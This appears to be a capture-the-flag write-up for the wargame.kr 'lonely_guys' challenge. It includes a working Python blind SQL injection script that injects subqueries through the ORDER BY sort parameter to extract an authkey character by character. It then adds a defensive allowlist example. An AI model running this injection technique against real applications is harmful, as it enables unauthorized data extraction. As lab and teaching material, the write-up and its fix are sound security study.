[wargame.kr]lonely_guys
This is a SQL injection through ORDER BY.
Reference: http://n3015m.tistory.com/173
A subquery such as order by (select 1) can be placed in the ORDER BY clause,
and when you use order by (select 1 from guys_tbl where XXXXX), if XXXXX is true the select returns several rows,
and then the whole query fails. The script below uses that difference (whether the page still lists a row or not) as the true/false oracle.
The script that uses this:
Ah, I forgot the Content-Type header in the POST and wasted time on that ㅠ stupid..ㅠ
```python
import http.client
import string
from urllib import parse


def blind(q):
    con = http.client.HTTPConnection('wargame.kr:8080')
    head = {'Content-type': 'application/x-www-form-urlencoded',
            'Accept': 'text/plain',
            'Cookie': '####'}  # session cookie, redacted in the original post
    # the condition q goes into a subquery inside the ORDER BY clause
    params = parse.urlencode({'sort': ',(select 1 from guys_tbl where ' + q + ') desc'})
    con.request('POST', '/lonely_guys/index.php', params, headers=head)
    res = con.getresponse().read()
    #print(res)
    # if q is true the subquery returns several rows and the whole query fails,
    # so the row 'jacob' disappears from the page; True here means q was false
    return b'jacob' in res


#test
#blind('desc')

char = '0123456789' + string.ascii_letters

## length ##
#(select%201%20from%20guys_tbl%20where%20(select%20length(authkey) from authkey)=40)%20des
leng = 40

print(char)
ans = ''
for i in range(1, leng + 1):  # substr() positions are 1-based, so start at 1
    for j in char:
        #print(ans)
        q = '(select ascii(substr(authkey,{},1)) from authkey)={}'.format(i, ord(j))
        if not blind(q):  # query failed => condition true => character found
            ans += j
            print('[*]find ' + ans)
            break
print(ans)
```
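For comparison, here is the fix on the application side. This is an added example, not code from the challenge or the post: the sort parameter is mapped onto an allowlist of column names and directions before it is placed in the query, so a value like ",(select 1 from guys_tbl where ...) desc" is rejected instead of reaching the database. The table layout (guys_tbl with name and age) and the sample rows are constructed for the example.

```python
import sqlite3

# Allowlist of columns the user may sort by and the two directions (assumed for this example).
SORTABLE_COLUMNS = {"name", "age"}
DIRECTIONS = {"asc", "desc"}

# Constructed sample data; 'jacob' is the row the challenge script watches for.
ROWS = [("jacob", 30), ("alice", 25), ("bob", 35)]


def build_order_by(sort_param: str) -> str:
    """Turn a user-supplied value such as 'age desc' into a fixed ORDER BY clause.

    Only allowlisted column names and directions are accepted; anything else
    (including subqueries or extra commas) raises ValueError.
    """
    parts = sort_param.strip().split()
    if not 1 <= len(parts) <= 2:
        raise ValueError("malformed sort parameter")
    column = parts[0].lower()
    direction = parts[1].lower() if len(parts) == 2 else "asc"
    if column not in SORTABLE_COLUMNS or direction not in DIRECTIONS:
        raise ValueError("sort column or direction not allowed")
    # The returned text is built only from our own constants, never from the input.
    return f"ORDER BY {column} {direction.upper()}"


def is_allowed(sort_param: str) -> bool:
    """True if the sort value would pass the allowlist."""
    try:
        build_order_by(sort_param)
        return True
    except ValueError:
        return False


def vulnerable_query(sort_param: str) -> str:
    """The pattern the challenge is built on: user input pasted straight into ORDER BY."""
    return "SELECT name, age FROM guys_tbl ORDER BY " + sort_param


def safe_query(sort_param: str) -> str:
    """Same query with the allowlisted clause instead of raw input."""
    return "SELECT name, age FROM guys_tbl " + build_order_by(sort_param)


def fetch_sorted(sort_param: str) -> list:
    """Run the safe query against an in-memory table and return the names in order."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE guys_tbl (name TEXT, age INTEGER)")
    conn.executemany("INSERT INTO guys_tbl VALUES (?, ?)", ROWS)
    names = [row[0] for row in conn.execute(safe_query(sort_param))]
    conn.close()
    return names


if __name__ == "__main__":
    injected = ",(select 1 from guys_tbl where 1=1) desc"
    print(vulnerable_query(injected))      # the subquery lands inside the SQL text
    print(is_allowed(injected))            # False: rejected before any query runs
    print(fetch_sorted("age desc"))        # ['bob', 'jacob', 'alice']
```

Column names cannot be bound as parameters in prepared statements, which is why ORDER BY is a common spot for this bug; the allowlist is the usual fix, and rejected values are also a cheap thing to log, since a sort parameter containing "select" or a comma never comes from the normal UI.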